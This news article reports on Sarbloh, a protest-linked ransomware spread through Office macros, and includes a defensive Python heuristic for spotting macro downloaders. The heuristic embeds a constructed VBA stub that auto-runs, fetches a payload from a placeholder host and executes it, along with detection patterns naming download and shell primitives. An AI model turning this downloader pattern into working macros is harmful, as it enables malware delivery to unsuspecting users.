Activists aligned with the farmers’ protests are reportedly using a ransomware-style cyber attack in a bid to raise more voices for the cause of the protesting farmers in India. Against the backdrop of the ongoing farmer protests against the newly enacted Farm Bills 2020, Quick Heal, an Indian cyber security company, claims to have found evidence of an attack campaign by a group calling itself ‘Khalsa Cyber Fauj’. Through this attack, the activists are said to be spreading a ransomware file that encrypts the files on a computer once it has been downloaded and run, but does not demand a conventional ransom.
Instead, as Tejaswini Sandapolla, a security researcher at Quick Heal, writes, the ransom note states that the encryption will not be removed until the demands of the protesting farmers have been met. A blog post on the ransomware explains that the attack hides its code inside macros in ordinary Microsoft Office documents. Once a user downloads such a document and enables macros, the macro executes a command that downloads the actual malware file from a remote server. The ransomware is called Sarbloh, after the file extension it carries.
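As an added illustration (not code from the article or from Quick Heal's analysis), the following Python triage heuristic flags the macro pattern described above: an auto-executing macro that fetches a second stage from a remote server and then runs it. The VBA text it inspects is constructed for this example, the indicator names are common VBA/COM identifiers rather than anything from the Sarbloh sample, and the URL is a placeholder.

```python
import re

# Constructed VBA source, the kind of text an analyst sees after extracting a
# macro from a .doc/.docm file. It is NOT the Sarbloh macro, only a stand-in
# that follows the "download a second stage, then run it" chain the article
# describes. The URL is a placeholder.
DOWNLOADER_MACRO = """\
Sub AutoOpen()
    Dim req As Object
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "GET", "http://stage2.example.invalid/payload.bin", False
    req.send
    ' code that writes the response to disk is omitted from this sample
    Shell Environ("TEMP") & "\\payload.exe", vbHide
End Sub
"""

# Constructed benign macro used as a control case.
BENIGN_MACRO = """\
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
"""

# Indicator groups. Auto-execution entry points fire on open without a click;
# the network and execute groups are the two halves of a staged download.
INDICATORS = {
    "auto_exec": re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I),
    "network": re.compile(
        r"\b(MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile|DownloadFile|Invoke-WebRequest)\b",
        re.I),
    "execute": re.compile(r"\b(Shell|WScript\.Shell|Run|Exec|powershell)\b", re.I),
    "url": re.compile(r"https?://[^\s\"']+", re.I),
}


def triage_macro(vba_source: str) -> dict:
    """Return matched indicators per group and whether the macro looks like a
    staged downloader (auto-exec + network fetch + execution)."""
    hits = {name: sorted(set(rx.findall(vba_source))) for name, rx in INDICATORS.items()}
    hits["suspicious"] = bool(hits["auto_exec"]) and bool(hits["network"] or hits["url"]) and bool(hits["execute"])
    return hits


if __name__ == "__main__":
    for label, src in (("downloader", DOWNLOADER_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_macro(src))
```

A heuristic like this belongs in mail-gateway or sandbox triage as a first filter; a match is a reason to detonate or block, not proof on its own.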
The Khalsa Cyber Fauj’s Sarbloh ransomware cannot be decrypted by victims because it combines a dynamically generated AES encryption key with an RSA public key belonging to the attackers, which is stored within the document itself. In essence, the Sarbloh ransomware used by the self-described farmers’ protest activists is very typical of the malware circulating on the internet today: it is dropped onto a PC by a well-known downloader pattern and then encrypts every file on the device.
However, it is not yet known whether the Sarbloh ransomware is being spread through typical phishing emails or through other channels as well. It is also unclear whether the ransomware has any known weaknesses, and Quick Heal has further claimed that it includes a command to delete the shadow copies of files stored on a system, which may make it next to impossible for users to recover their files if their PCs are infected. It is also unclear whether the Khalsa Cyber Fauj is actually aligned with the leaders of the farmers’ protests, or whether its members are miscreants cashing in on the present socio-political stand-off with separate political motives of their own. No farmer leader has so far issued any statement in connection with this ransomware.
To stay safe, the most reliable precaution is to never download an attachment to any device until you are sure it is meant for you. Open only emails and messages whose sender and content you can personally verify, so that your online safety is not exploited by unknown sources.